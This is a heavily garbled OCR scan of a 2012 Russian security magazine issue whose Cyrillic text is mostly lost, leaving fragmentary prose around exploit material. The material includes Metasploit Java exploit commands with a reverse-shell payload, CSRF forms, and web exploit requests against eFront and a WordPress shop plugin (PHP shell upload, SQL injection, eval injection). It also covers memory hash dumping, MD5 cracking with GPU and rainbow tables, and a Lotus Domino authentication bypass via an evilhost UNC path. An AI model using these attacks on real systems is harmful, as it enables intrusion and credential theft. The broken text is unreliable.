netsh firewall set opmode
disae
wmic product get name /value

wmic product where name="XXX" call uninstall/
nointeractive
rundll32.exe user32.dll, LockWorkStation
- ( , ) ,
.

Windows.
, -
( , ).
( ) .
..........................................................................................:...................................... .
/S
<<GreenDog , Digital Security ltwitter.com/a ntyurinl
MITM
RDP
Iir!!t.:t
.
-
. ,
51 [
RC4 ).
. , ,
,
. ?
, i-. ,

RDP,
. ,
D5- ,
[ . . ). .
: <<
Windows, 2000 [ ). .
~ .
n - ,

TLS .
g:l[ZyAQy).
[gQQ,
RDP MiTM,
, .
6-
. -
man-in-the-middle [MiTM),
Cain&Abel [www. oxid .i tl:
,
, n . ,
11
n ,
21 ARP ARP .
31 n.
L.l : ,
. ,
<< >>
MiTM
RDP.
, , , ,
Siffe S addess.
-, .
51 ap-poisoing .
, : ) .
i

RDP
6- :
. i-
ARP-RDP
RD- .
, , .
Ol ARP - DN S-. , <<
11
. ?
. ,
21
salt ' o. .
31 ,
.
L.l
.
050
. , ,
- longeek ' a
[goo.gi/Embxsl.
RD-,
, .
[goo.gl/pydMZI. ,
,
2003
RPD 5.0.
01 / 156/201 2
EASY
JAVA
,
,
Java,
, . ,
,
Fl ash,
Ja va
J v- .
, ,
. ?
. ? ':]
Java
, . javateste.og/
JavaScipt,
vesio.html .
Jv-,
. , ,
. ? ,
-
CVE-201 0-4452,
Metasploit'e:
l defco- r ussia . u/wa ll. t x t ].

SET [Social gi Too lkit].

B ackTack
l www.social-e g i ee . og].
SET
, .
11 :
use exploit/widows/browser/java_codebase_trust
2) :
set URIPATH test.php
set LPORT 88
3) :
Set payload java/ meterpreter/ reverse_tcp
4) :
Exploit
tt
,
Ja va
:].
. : -
SET
1) Website Attack Vectos;

2) The Java Applet Attack Method;
3) Web Templates [
Site l ];
4) Gmail Gmail;
4) lmp otyouown executae,
.
- . ,
,

Java .
, ? ?
- .
? ?:] ,
, ,
- . ,
. ,
:11,
[ ).
. ,
, ,
- ,
. :
SMTP [25/I
. ,
Gmail
Mail.u.
www.example.com:25l. ,
nmap
, , , , ,
, -
, -. ,
. ?
150
. ,
IP.
UOP
ICMP,
l www . proxy . ru l, ,
.
. , security. nov. u
,
, ,
Proxy server
Use proxy server for your LAN (These settigs will t apply to
dial-up or VPN conections),
. :1
[ * ], [
Address:
Bypass proxy server for local addresses
pro)(y
-25
01/156/ 2012
~['iiiiiiiiiiiiiiiiil]l
Port:
~ 1Advaced ...
051
1EASY
REVERSE-POKC
~ , vs
. ? ,
-, [
) -
. ? . ,
vs-
-,
WAF
SS L- cepepa,
, [,
) .
.
,
[ ,
HP-traceroute.
Squid
reverse proxy
reverse-npoc Wikipedia.org
- ?).
.
vs-
, ,
- . ?
. ,
. ,
GET
POST,
TTL I- .
- .
. ,
- ,
X-F owaded-Fo,
- taceoute. , R -
, ! , -
-,
MaxFowads. ta ceo ut e,
lgoo.gi/VObeW). ,
RFC 2616
1.1,
Fowads . ,
TR ACE
OPTIONS.
RFC,
GET
I- .
:
HTTP-Traceroute.py -t www.victi m.com

GET/POST)
-m
CSRF
(TRACE/
.r\!
L LJ
. GET- an p oc- . ,
S?
CSR F [Coss Site Request Fg,
) . ,
- . ,
,
[, ) ,
[ ,
) . ,
, ,
<form name=passwd action=

"http : //server.com/change_password.php" method="post" >
<input type=hidden name= NP value= new_pass >
<input type= "submit" >
</form>
<script>document.passwd.submit(); </script >
. ,
, n Ja vaSc ipt . ,
- -
anpoca? - XM L- a np oc.
XML-
:)
. .
G- : http://
seve.com/change_passwod.php? NP=ew_pass, ew_pass , . ,
L' :
<iframe src= http ://server.com/c hange_password.php?NP=

new_pass>< / iframe>
,
052
<form name=passwd ENCTYPE="text/plain "

action="http : //server.com/change_password.php"
METHOD="POST" >
<input type=hidden name= '<?xml version'
value= '"1.0"?><User><Password>new_pass</Password></User>' >
</ form>
<script>document.passwd.submit();</script>
, , . ; ) .
01 /156/2012
EASY
!, ,
er..i.r.~t
---
digital
foensicsl- ,
.
,
,-
.
, :
;
n ;
;
DLL- ;
;
;
;
Vitual Addess Descipto;
;
. .
,
, , ,
Volatility 19QQ]L
Hi5ip l. Python'e
Windows ! XPI, , 32- .
n .
imageinfo- ;
f d:\te st.aw- .
Volatility - . ;l
IWinX PSP3x86l,
, n
. , ?
, ,
!
!, , n
. ,
volatility pslist -f d:\test.raw
--profile=WinXPSPx86
MoonSols Dumplt ihttp://goo .gi/BY1QN J.
, , :
- :
.
volatility netscan -f d :\test.raw
. , n ,
! ,
USBI.
, - ?
Volatilit y.
, Python'o,
- , ,
,
SAM, -
LSA?
Windows .
stndln- , .
, :
volatility.exe imageinfo -f d: \test .raw
volatility hivelist -f d:\test.raw
hivelist-
--profi le=WinXPSP x86
,
:
volatility hashdump -f d:\test.raw

- ls -s exelsese
hashdump-
103560- System;
s 180560- SAM.
, . ,
. ,
, .
Volatility.
01 /156/2012
053
[ivinside.iogspot.coml
[115612, . , .11
Microsoft Office 2007
Excel.xlb
CVSSV2
111111 111 11 11 11111 1111
9.3
111 11
IAV: N/AC :M/AU: N/C:C/J:C/A:C)

[]]
:
5 2011 .
Aniway, abysssec, sinn, juan vazquez.
CVE: CVE-2011-01 05.
n ,
. ,

, ,
Excel.
f:J!Iii
Excel
, ,
051,
! , ).
xl b.
01 / 156/ 201 2
start () ;
(CLASS SESSION ACTION ) ;

SsessionAction = - Sessi~nAction () ;
SselectedDocuments = SsessionAction ->get () ;
if( removeTrailingSlash ($sessionAction ->getFolder ())
&& sizeof ($selectedDocLJments ))
==
getParentPath ($ POST [ ' id ' ])
if(($ key = array search (basename ($ POST [ ' id ' ]) , $selected0ocuments )) !== false )
{
$selected0ocuments [$key ] = $ POST [ ' value ' ] ;

$sessionAction -> set ($selectedDocuments ) ;
}
baseame ( $ POST [ ' icJ ' ]) . "\n ";
displayArray ($selectedDocuments ) ;
-- removeTrailingSlash ($ POST [ ' id ' ]))
} elseif( removeTrailingSlash ( $ sessionActio -> getFolder ())
POST [ ' id ' ]) ;
S sessionActio -> setFolder ( $
writelnfo (ob get
l ()) ;
ajax _ save _name .php
BIFFB.
Bl FF-
BOF
Visua l Basic module

Works heet
Chart
BIFF4 Macro sheet
BIFF4 Work book globals
= workbook globals

Workbook globals
BOF
7.
,
EOF
BOF
worksheet
Sheet records
sub _3 0199E55.
EOF
BOF
= worksheet
Sheet records
, ,
,
EOF
.text:esF8e
.text:e5F835
ID
.text:e5F838
( )
sz
( )
.text:e5F844
.text:e5F849
(ID ] - .
.t ext:e5F84 F
. text:e5F856
: BOF IBegi Of File] EOF IEd Of Fil e].
.text:e5F858
.text:e 5 F85E
BOF, :
.text:e5F862
.text:e5F867
BOF , BIFF8
.
2
4
12
~;
. text:e5F869
2
2
2
2
2
2
4
4
89
ID
.text : e5F86A
01
. text:e5F86C
f'
.text:e5F86E
***.fc H
. text:e5F86F
ID
.text:e5F872
call su_11
mov , [ebp+var_EDC]
imul , [ebp+var_Fee]
mov edi,
mov , [ebp+var_EEe]
lea , [ + + ]
call su_ l
push eFFFFFFFDh
edx
sub edx,
add , edx
push ; Dst
push ; int
mov , edi
call sub_e199E55
F-:
.text:e5F87e
.text:e5F83E jz l_54488
(sz
call su_11
cmp , h
mov [ebp+var_ED4] ,
Excel,
sub_30199E55
,
. ,
.
- Workbook globals
01 /156/2012
055
static
checkFile ($name ) {
if ($GLOBALS [ config uration
file k list l ] !=
$ acklist = explode (" , ", $GLOBALS [ configLJration
} else {
puic
11
][
$ acklist
}
$ acklist
[]
{
1
1
][
file
list
1
]);
= ();
= pt1p
1
1
;
$extension = pathinfo ($name , PATHINFO_EXTENSION );

foreach ( $ acklist as $value ) {
if ($extension == trim (mb str-tolol..rer ($valL1e ))) {
throw
EfrontFileException (_YOUCANNOTUPLOADFILESWITHTHISEXTENSION .
.$extension , EfrontFileException : :FILE IN BLACK LIST );
1-
CheckFilell
.text:30199E0
.text:30199E4
-. n
cmp edi, [e sp+4+Dst]

ja loc_303EE1B7
.te xt:30199 E A mov , [esp+4+arg_0]
.text:30199EE push
.text:30 199E F mov , dword_30F72C0
. text:30199E75 push
.text : 30199E7 mov , nNumberOfBytesToRead
.text:30199E7C push esi
.text:30199E7D mov [esp+ l0h+Dst],
, n
.
, .

memcp y,
nepen
, / GS . ,
esp .
,
ca ll esp .
mov , [esp+l0h+Dst]
push esi ; Size
lea edx, dword_30FEB8[ebx]
push edx ; Src
push ; Dst
sub edi, esi
call memcpy
add [esp+lCh+Dst], esi
add , esi
.tex t :0 199EAD add esp, 0Ch
.text:30199EB0 test edi, edi
.text : 30199EB2 mov dword_30F72C0,
.text:30199EB8 jnz loc_301E0DB
. text:30199E93
.text:30199E97
. text:30199E98
.text :30199E9E
.text:30199E9F
. text:30199EA0
.text :30199EA2
. text:30199EA7
.text:30199EAB
i(.1;ldfifi
Microsoft Office Excei2007/ Microsoft Office Excel2007 SP 2.
,_i,J!IiitJ:I
, .
MS11-077 Win32k Null Pointer De-reference

Vulnerabllity
~2
CVSSV 2
11111
111111 111 111 11 11111
[AVL/AC:L/Au:N/C:C/1 /)
1]]
,
.
: 22011 .
:
KiDebug.
CVE: CVE-2011-1985.
/ GS / SAFESEH . , /GS-
wi n32k.sys ,
MS Visual Studio,
, .
>> n.
,
.
IJ34!Jii
cookie,
.
64-

, ,
coo kie. , ,
. -
. /S AFESEH
S- .
,
, n
. ,
. Visual Studio
/ SAFESEH
056
.text:BF9140C0 ; _stdcall NtUserfniNCBOXSTRING(x,x,x,x,x,x,x)

.text:BF9140C0 _NtUserfniNCBOXSTRING@28 proc near
CODE XREF: xxxDefWindowProc(xJx,x,x)+E [ p
. text:BF9140C0
NtUseressageCall(x,x,x,x,x,x,x)+l[p
.text:BF9140C0
.text :BF9140C0 WND
dword ptr 8
. text :BF9140C0 arg_4
dword ptr 0Ch
.text:BF9140C0 arg_8
dword ptr 10h
.text:BF9140C0 arg_C
dword ptr 14h
dword ptr 18h
dword ptr lCh
dword ptr 20h
01 /156/2012
- BSoD:
RETURIJ t o
EXCEL . O II OEE
frooo
f:L .7
14
CB_SELECSTRING
exe14D
CB_FINDSTRINGEXACT
LB_ADDSTRING
LB_INSERTSTRING
LB_SELECTSTRING
LB_FINDSTRING
LB_FINDSTRINGEXACT
LB_INSERTSTRINGUPPER
LB_INSERTSTRINGLOWER
LB_ADDSTRINGUPPER
LB_ADDSTRINGLOWER
1s
14
14
11
1
exelBF
12
exelAA
l
1
exelAD
.,.,,Jdjfi
.text:BF914ece
.text:BF914ece
.text:BF9148C2
.text:BF9 14eC
. text : BF9148CS
; WND
.text:BF9148C8
CB_ADDSTRING
CB_INSERTSTRING
CB_FINDSTRING
==
mov
edi, edi
push
mov
, esp
mov , [ebp+WND)
exffffffff (-1),
mov , [ecx+2eh )
Windows SP3/XP SP2 64, Windows 2003 Sv SP21+ itanium,x64l,

Windows Vista SP2/ SP2 64 , Windows Sv 2008 SP2 32/64/
itan ium, Windows 7 32 / 64 , Windows 7 SP1 32/64, Windows Sv
2008 2 x64/i tanium, 2 spl x64/itan ium .
BSOD
f"jJ!IijiJ:I
MSll-077, .
NtUs e MessageCall NtUsefniNCBOXSTRING

, CB _ ADDSTRING:
.text :B F88 EE6B ; i nt __stdcall NtUserMessageCall(int,

int, int UnicodeString, PVOID Address, int, int, int)
.text:B F88EEB1
push
[ebp+arg_18)
; int
movzx
, ds:_MessageTae[eax]
.text:BF88 EEB4
push
int
.text:BF88EEBB
[ebp+arg_le)
int
.text:BF88 EEBC
push
. text: BF88 EE BF
and
, Fh
. text : BF88EEC2
push
[ ebp+Address]
Address
.text :BF 88EECS
push
[ebp+UnicodeString] ; int
. text: BF 88E EC 8
push
[ ebp+arg_4]
; int
. t ext: BF 88EECB
push
esi
; int
. text : BF 88E ECC
ca l l
ds:_gapfnMessageCall[eax*4 )
; NtUserfniNSTRINGNULL(x,x,x,x,x,x,x)
Wordpress
Zingiri Web Shop Plugin
CVSSV2
11111111 1111 11 11111111 1
~5
1111 111 1
I:N/ AC:L /Au:N / C: / 1: P/ A:PI
l1
WodP e ss
.
, ,
.
- -,-

,
.
Egidi o Romano aka EgiX . EgiX

13 ,
,
. rdat a:BF998D68 _gapfnessageCall dd offset _NtUserfnNCDESTROY@28

.rdata :BF998D68
; DATA XREF: NtUseressageCall(x,x,x,x,x,x,x)
. rdat a : BF99eD68
; NtUserfnNCDESTROY(x, x,x,x,x,x,x)
.rdata : BF998D6C
dd offset _NtUserfnNCDESTROY@28
; NtUserfnNCDESTROY(x,x,x,x,x, x,x)
.rdata:BF998D7e
dd offset _NtUserfniNLPCREATESTRUCT@28
; NtUserfniN LPCREATESTRUC(x,x,x,x , x,x,x)
. rdat a: BF998DD4
dd offset _NtUserfniNCBOXSTRING@28
; NtUserfniNCOXSTRING(x,x,x,x,x , x,x)
IJ:J4!Jii
/fws/addons/
t i m e/j sc i t s/t i _ m 1 1u g i s/ j f i 1 ma g 1 j _ s ave _
name.php, 37-56
.
$selectedDocuments POST - value.

$selectedDocuments
displayAayll witelnfoll,
, $selectedDocuments.
witelnfoll , /fws/addons/
t i m /j s i t s/t i _ m / 1u g i s/ j f i 1 ma g 1 j _ t _
folde.php:
SendMessageCallback((HWND)- l ,CB_ADDSTRING, e, e, e, e );
function writeinfo($data, $die = false)

{
$fp = @fopen(dirname( __ FILE __ ) .
DIRECTORY_SEPARATOR . 'data.php' ,
@fwrite($fp, $data);
SendNotifyMessage((HWND)- l ,CB_ADDSTRING, e, e );
01 / 156/201 2
'w+' );
057
i f ($_POST[ 'templateName' ]) {
$dir = ' .. / . / .. / .. /content/editor_templates/' .
$_SESSION[ 's_login' ];
i f (!is_dir($dir) && !mkdir($dir, 8755 )) {
throw new Exception(_COULDNOTCREATEDIRECTORY);
$filename = $dir. '/' .$_POST[ 'templateName' ]. '.html' ;
$templateContent = $_POST[ 'templateContent' ];
i f (file_exists($filename) === false) {
$ok = file_put_contents($filename,
$templateContent);
chmod($filename, 8644 );
GetUserTimeTargetll
, file_put_
contents() $_POST[ 'templateName' ] $_

POST[ 'templateContent' ] , . ,
@fwrite($fp, "\n\n" date( 'd/M/Y H:i:s' ) );

@fclose($fp);
, ,

!
data.php,
php,
magic_quotes_gpc. ,
, :
-.
ex pl oit- db .co m
!EDB-10: 18111].

.
,
, :
11 Arch Li nux
# pacman -5 php
/ / Debian- ba sed
# apt-get install php
POST /efront/www/editor/tiny_mce /plugins/

save_template/save_template.php /1.1
Host: localhost
Content-Length:
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
templateName=sh.php%ee&templateContent=
< ?php evil_code(); ?>
2. .
checkFile[], /libaies/filesystem.
class.php, 3143-3154
. FileSystemTee::uploadFile!l,
, hkFil[]
$ php 18111.php <host> <path>
. , ,
<host>- ,
<path>- WodPess.
file_ack_list,
Joomla!, -
CONFIG_SYS_ROOT_PATH.
if1;1d:Jfi
php, php3, jsp, asp, cgi, pl, , ,

bat.
php.
3. SQL- UPDATE.
getUseTimeTaget[], /libaies/
Wodpess Zigii Web Shop Plugin 0.9.12 2.2.3.
tools.php : .
fil!iijiB'

'
2.2 .4 .
package_l ,
$entity. , /www/
peiod ic_ u pdate.php:
eFront
~5
CVSSV2
111111 1111 111 11 111111
1111
[AV: N/AC:L/Au: N/C:P/1: /:]
IIJj]
EgiX

eFont.
,

, .
f:JQ!Iii
1. .
/www / d i to /t i ny_ m / 1ug i s/save _ te m 1 te/s ave _ te m 1 te. h
! 8-18]:
058
i f ($_5ESSION[ 's_login' ]) {
$entity = getUserTimeTarget($_GET[ 'HP_REFERER' ]);
//$entity = $_5ESSION['s_time_!arget ' ] ;
//Update times for this entit y
$result = eF_executeNew( "update user_times set time=time+("
. time().
"-timestamp_now),timestamp_now="
. time().
"lr.tlere session_expired = and session_custan_identifier =
$_5ESSIDN[ 's_custom_identifier' ].
"' and users_LOGIN = '" .
$_SESSION[ 's_login' ].
"' and entity = '" .
current($entity).
"'and entity_id
key($entity).
"'" );
01 /156/2012
, $_G['_REFERER'],
getUseTimeTagetl l ,

eF_executeNew ll . ,
SQL- URL
:
http:/ / localhost/efront/www/periodic_updater.php?
HTTP_REFERER=http://host/?package_ID=[SQL]

$_SERVER('HP_REFER ER '], , -,
.
.
4.
/www/index.php:
if (isset($_COOKIE[ 'cookie_login' ])
&& isset($_COOKIE[ 'cookie_password ' ]))
try {
$user = EfrontUserFactory :: factory(
$_COOKIE[ 'cookie_login ' ]);
$user - > login($_COOKIE[ 'cookie_password ' ], true);

$_COOK IE ['cookie_login'J.
EfontU serFactory::factoyll,
,
:
GET /efro nt /www/index.p hp /1.1

Host: localhost
Cookie: cookie_login=admin;cookie_login=1;cookie_
login=administrator;cookie_login=1;cookie_password=1
Connection : keep-alive
5.
-.
/www/s tudent.php:
if (isset($_GET[ ' course' ]) 11

isset($_GET[ 'from_course' ]))
if ($_GET[ 'course' ])
$course
else {
$course
new EfrontCourse($_GET[ 'course ' ]);

new EfrontCourse($_GET[ ' from_course' ]);
$eligibility = $course - > checkRules(

$_SESSION[ ' s_login' ]) ;
WEXLER.BOOK ESOOl
2033 ~
WEXLER
, $_GET['couse'] $_GE[ 'from _

couse'J.
EfrontCourse,
evalll :
/s tudent.php?lessons_ID=1&course[id]=1&course
[directions_ID]=1&course[rules]=a: 1 :{s: 19 : "1];
phpinfo();die; /* " ;a: 1 :{s: : "lesson" ;i : e ;}}
if.1;1dJt1
Ft <= 3.6.1 [build
119441.
,_1,J!Iii[I:J
. ::::
01 /156/2012
WI!XLI!.
www.wexler.ru
pilifijij
: 8 (800) 200 96 60
[iog.chivavas.org[
I
4850
2 n
2,2

!
Radeon
bjt.Jy/yEhdi
RainbowCac k n
n ! .
bjt.[y/viSB9K -
n
~>
MD5
MD5.
,
. -,
,

,
.
, ,
MD5.

:
,
. ,
.

. -
l
l
, . .

MD5
MD5.
1 28-
. , 1 28-
, .

1991
MD4 .
1992 RFC 1321. MD5
, CMS
-
- SS L-.
,
1993
MD5
, . ,
1996-, ,

MD5.
SHA1 [
, ,
SHA21 RIPEMD-160.
MD5 1 2004 .
MD5CRK -
CetainKey Cy ptosystems
.
- .
24 2004
, - ,
01 /156/20 12
~ '(
,,
'"''- "
f 1H
LJJ
11:'
;,.
.,
' 'jiJI:fl(,(;
;t
, JII
,J,J
(.,J
.,,
."
t:' l
'!
'' '1'
14
,,
1;
Cl~
., w
'11
-~
'-,t,
Loto
11
1)/
'/
!:!1
~ 1
t-~-
.JH
~i
..ili
Ul
".,
l;f,
t,
,-,.,"
l:f,
1:-'
j,
11
1-'
1/
l; fj
:'
~.-
Jl
.~.
.,
,, ,j
''11~ ::-
..
,.,.,,,,,,,
w
., ~
,.,j
: :t
::,
~~
1_1 1
,/
;,
tH
'"
t- ~.
,,
: :-;
'1;
HIIL,
<i !" :l
. 1
~. -
l't
/ 1
: I'J
/1
41
,,,
. ,
'"
1' /
. -
f lf,
/IJ
1'<
;t .
l,'i
'1,
41.1
"4
t,::
~-
,,.,
1::
.'
-;;
~ -
11!
t.tl
IJ1f
'1
I 'J
31
,,,
''
11
;;,,
/1>
1!1.1
Keccak
Skein.
2008
NIST
SHA1 SHA2.
BLAKE, Gostl, JH,
' j~:
,,j
1''1
.,,;
-;,.
:1 '1
::
Ui
:''
"'-; ,
/1
11
11
~~
t.'J
ol1
f lf,
1'1
c 1J
'
~
,_,,
,,.;
lof,
111.
~'11
(Jrj
,,.
. ,
''
f';
/1>
- : d8578edf8458ceefbc5b76a
t,.,
1<1
J
4~
' !1:
':
tl:
),J
-~
,,.,
/'.-'
, -
f lt,
<4
4
l oJ
f o<l
::/
,,,,
.,,
1J'1
t ..t
oJI!
ibl
t.'1
\!
::;
4;
~; 1
f:,J
00
ili
-;-;
'
: t
1 -~'
1.'
IJ'I
(Jf,
<11
~ r .1 ~
''
. ,,
"' "
MD5
,, ..
/'HJ~,.1,.J;,;L, 1 ,t t. t.,;,,,,.
;;
1)1}
-~
GHASHGPU:
GPU
5854.
1:;,,,,f '1 t .1
lghashgpu,
www.golubev.com
DS-
.
xe a , lghashgpu
GPU,
Vid ia ATI CUDA/
ATI Steam . n
, CPU,
.
GPU ,

. , :

Windows:
ighashgpu .exe -t:md5 \

-h:d8578edf8458ceefbc5b6a58c5ca4
-max:7
MDS
MD5.
- [qwetyl.
,
, - ,
. dllfd4559815b2c3delb685b
86283, , ,
<<_admi .
IBM 690 [ ,
, :
].:-] 2005
.
ighashgpu.exe
. 509
-u:[abcdefghijklmopqrstuwvxyz1234567890_]
-h:dllfd4559815b2c3delb685b8a6283
-t : mdS
-m:??????_admi
, .
,
.
.
2006
2006
'-u'
, !
2008
'-m'
<<_admin >>.
Chaos Communication Congess

. 509.

MD5.
2007 ,
Sony Pla yStat io MD5.
: 1,4 D5-
! , 2009-, BlackHat
USA GPU ,
, -
n ,
n .
. ,
. ,
2011 IETF RFC 1321 [MD51

RFC 2104 [HMAC-MD51 . RFC 6151.
MD5
<< ,
. ,
- , .
<< - ,
MD5 . ,
MD5
, ,
. ,
, .
01 /15612012
061
- -
..
l! ~t b
Pl l illtt llt
Pl t 1ntt rt1DI!tr
~ 16(t6)c: t 0 t1t.72fOc:t !d6 ~ c:99 !110
11t4.S:p.fi
fit65343561E e 36
blj bb7a!45140 ~ 503t ! 3ecc:Et!tt533bll
HHfi!74756!
R.) bHc:07bc:073 !1 !5t!!1Hd1 5H841tb
49 !.:61
70 3(39"'~""
0 o~ t70c:6datd72c:561at7dsttc:t o 6c!sl
ftl 7 !I)t2fd1422 12C.H99!d05ttt8b9 H
oe ~ htp2
d0 4:ny2V
306534!147032

- ,
pltintt rc:ot 16Et6Sc:t041 a72!0c: t!di79 !c:99 fd0 1s de45;:'16

pltltlttltt of 7t!45H 0450b3 1 !38c:c:6!!t ~533bl t 11 dHh t UO
pl l iflttat c f bH c:0~013f i 85 1 8!4!dt SH84ltb is p49! r.67
pl a illte t ot 02470<:6td!9d72c367 t 47d3!! c906d51 1s 04!4htp2
dilk: C: \ rtiCC:rtclr-l . S-\/1nS2\I:dS_lcoo.-e :tl ~!': l -fi..:Uric:tl-7_0_20001975054~9_0 .:t: 7800 43904 b..,::t 3 :t!&d
set rc:htn; forlhash ...

plt1nttlt of 1 t:2fd1H2 a 2c:4!99!d 0 5 e e!b944 11 dOt1r.yav
126
ASCII, 63 527 879 748 485 376 . 254
17 324 859
956 700 833 536, 2,7 ,
. , ,
. ,
d11t:thttld&orted
, .
pl&1nt t ztfound:
tOt&ltillle:
tio!chaint:a"-er,e:
ti:r.to!a lanzcect:
2.e9t
0 .54 s
1.03
ttuo!othe :opcrat1on:
tUoe: ot di1Jr n ad:
ha ' h ' redu.c:e c:aleul at 1ono! d'la1ntraver se:
h as h ,
0.01\
~.~3
99!
r t ductc: a lcul at ionofalar:~d'leclt:
7!
t pet do:ch aintrav.rte :

IPf't do!alarllchea:
3. 46
ll!illi~nl
4.1161111lli!!ll/ l
MD5
,
.
ecrypted.dat
. 80- ,
IGHASHGPU:

, 640 1 ,
. ,
. ,
. ,
cOOI:
2003 , , ,

f48494761d277762
f2da2e2a5a215b66995de1f9327dbaa6
c7f7a34bbe8f385faa89ae4a9d94dacf
-.
9478151927242f5
- << >> .
eea931d3facaad384169ebc31d38775c
49d854799ff9f8458
- [ ,
encypted.dat lghashgpu
:
64 ).
, .
. ,
ighashgpu.exe -t:mdS -u:[abcdefghijklmnopqrstuwvxyz123456789e_]

-m:??????ceel encrypted.dat

. ,
.
lghashgpu
ighashgpu _ esults.txt :
, n <<>>
. .
, n
feb46ac8494761ad2eaa7776c2a:1rootxceel
. ,
f2da2e2a5a21Sb6699Sde1f9327dbaa:pwd12xceel
c7f7a34bbe8f385faa89ae4a9d94dacf:pwd34yceel
. << >>
ccb9a4e7eBa151ec927e242feacS:pwd56yceel
4966d8547ccee99aeffe9f6845Be:pwd9Bzceel
eea931d3facaad384169ebc31d38775c:pwd78zceel
, .

IGHASHGPU:
n n>> .
, :
var plain = password + "s41t" ;

var hash = mdS(plain);
: 42151cf2ff27c5181bb36a8b
cfafea7b.
lghashgpu << >> <<-asalt >>:
ighashgpu.exe -h:42151cf2ff27c5181bb36a8bcfafea7b \
-t:mdS -u:[abcdefghijklmnopqrstuwvxyz123456789e_] \
-asalt:s41t
RainbowCack l poject-a i nbowcack . com ) ,

Windows,
RAINBOW TABLES
<< >> - ,

062
85-99%.
01 / 156/ 201 2
MD5
Linux . n : LN /
NTLM, MD5 SHA1. ,
- .
<<
MD5.
n: , ,
. n n F
Rainbow
s [ f eea i bow t aies.co m ) . , n

,
,
>> .

MD5, SHA1, LM
NTLM.
,
>>
. :
SHA1-
200
LN/NTLM, MD5
.
tg, RainbowCack. n
:
hash _algo ithm-aop
[LM, NTLM, MD5
SHA1);
chaset- ,
c haset . txt;
plaite xt_le_m i
plaintext_len_max-
tae_idex, chain_le, chain_um t_ind-
, [it.ly/dT8M).
n:
1.
tae_index- >> ,
.
, .
2.
3.
chain_le- n .
>> .
hin_um- n .
n .
4.
pat_index-o , .
MDCa ck, CPU [

).
GPU [nVidia GeFoce GT 220), CPU [lntel Atom N450,
0).
>>
MD5:
) ~
GPU
CPU
4
5
ee:ee:el
ee : ee:el
::l
::
: :9
: :l
::l
ee:es:21
: : 1
. ltel
ee::ll
9:27:52
::4
rtgen.exe md5 loweralpha-numeric 1 7
zeee
9755489
Atom N450
:). md5_
lowealpha-numeic#1-7_0_200097505489 _.t 1,5 .
,
,
,
GPU
CPU
>> .
. n
tsot.exe:
rtsort.exe md5_loweralpha-numeric#l-7_e_zeeex975e5489_e.rt
. ,
4-
5- ,
n .
l
. :
. ,
d8578edf8458ceefbc5ba58c5ca4. cack_gui.exe
- .
Add Hash ...
File .
. >> .
Seach
Rainbow s ...
Rainbow .
md5_loweralpha-numeric#l-7_e_zeeex975135489_e.rt,
Open. n !
.

.
- , ,
MD5
SHA1.
SHA2 S
[ ). - ,
.
VS. CPU VS. GPU
, ,
>> .
lghashgpu
- ,
n D5- , ,
. ,
RainbowCack
01/156/2012
100 %,
. ::::
063
EJ
RDP
Plugtns
ots tist
Ftles
.-6
setttnas
Hack the Planeti
Spy
....
f! Anti.&i..Rud
FF -binjW:
Op<tr fongnobbo
Ch rom formgibet~
Spy
...,
Installer
---------- conflo.php
- - - - - - -- - - - - - ,
ll'!y5QL
( forCP):
lnl itle :~CN" "Your JavaSctipt ls tumed off. Please, enaieyoo

>o:::'c:J:::s_
---:--'=:...:;:=
,. .,...., ._~ID.ot--1
~ - ( III..">!.J18)' )
YDUI"Javakrlplla
lwodorf. PI8aaa , a~.yowJ&.,...a , a"*~~..-: con .
to[y- e.-ano,t;rt~ -Co~"'",..JI*""'
....-.
~ ( IINI8t1o011!YC.I'P8"'"'Y )
YowJavaScriptl8t.. .,.dofi . Piea , anablly-JS
~h l
P18a. an111
-~ntf -CO<N~---
~ - I I1>811nl:ti'J'~"J' (
Y-JavaSc.pel8t,.Ndotf. PI8"a, ana.
v-Js
Plea , e~~terp.~oword
WWWI'IDVI\1 ~ l ,twJt,oonl
intitle:"CN" "YourJavaSaipt ls tumed off. Please.
e~bl!_~ ~
Digital Security ltwitter.co m/asin tsovl
Lotus,
IBM Lotus
Domino Server
-
IBM Lotus
Software,

IBM Lotus
Notes.
www. zerodayiitia
tive.com - ZDI;
www:ii)m.com/software/ru/lotus/ -IBM
Lotus Software;
buatraq.ru - BugTraq;

LOTUS DOMINO CONTROLLER
dj.navexDress.com -
DJ Java Decompiler.
, ,
,
.

.
IBM,
.
, ,
. .
Lotus
Lotus.
: , , . . ,
, .
.
- ,
.: ]
,
.
, ,
, .
Lotus
CVE-2011-1519
[ , ]. ,
. : ]
- , ,
ames.nsf - .
, ,
8.5.2FP2.
exploit-db.com
Lotus
ZD I ZDI-11-110,
Oday ( ].
<<

Lotus Domino S v
tll.
BugTaq ,
ZDI,
IBM suit-
, -
2050.
, ,
COOKIEFILE,
068
01 /156/20 12
Lotus,
fotunec i ty. com/neshkov/dj . htm l l, j- :\
gm Files\IBM\Lotus\Domino\Data\domino\java\dconsole.ja
UNC,
n Jv- .
. ,
, NewCiient.class,
SYSTEM>>.
~ COOKIEFILE
, \\evi lhost\passwod _coo kie_file,
11 sl-
i f (sl.equals( "#EXIT" ))
return 2;
, ,
2ese/tcp
i f (sl. equals( "#COOKIEFILE" ))

i f (stringtokenizer.hasMoreTokens())
11
, ,
2050.
// #COOKIEFILE < n >

cookieFilename = stringtokenizer.nextToken().trim();
return 7;
, Lotus .
.
, .
, ,
i f(! l.equals ( "#UI" ))

i f(stringtokenizer .hasMoreTokens())
11 ...
usr = stringtokenizer.nextToken( "," ).trim();
i f (usr == null)
return 4 ;
i f(stringtokenizer.hasMoreTokens())
,
nmap.
Ltus-,
, ,
.
11
socket:reconnect_ssl()
pwd = stringtokenizer.nextToken().trim();
return ;
socket:send( "#API\n" )
socket:send( ( "#UI %s,%s\n " ):format(user,pass)
socket:receive_li nes( l )
.
:
socket:send( "#EXI\n" )
/*
, Ltus-
*/
do {
: SSL- ,
#>>. ,
/ / ReadFromUser-
int i = ReadFromUser();
admin pass
#UI admin,pass.
, ,
nmap
COOKIEFILE . ,
i f (i == ) { // #APPLET
appletConnection = true ;
continue ;
, #COOKIEFILE \\evil\
file. , ,
[ ,
! .
userinfo = UserManager.findUser(usr);
i f (userinfo == null) {
/1 . .. !
WriteToUser( "NOT_REG_AOMIN" );
continue ;
. ,

Java, IDA , -
. DJ decompile [ membes .
i f (!appletConnection)
// #APPLET,
fiag=vrfyPwd.verifyUserPassword(pwd,userinfo.userPWD());
else // #APPLET
/ 1 COOKIE? !
fiag = verifyAppletUserCookie(usr, pwd);
} while ( true ); // end loop
i f (fiag) // ,
// , !
,
#APPLET
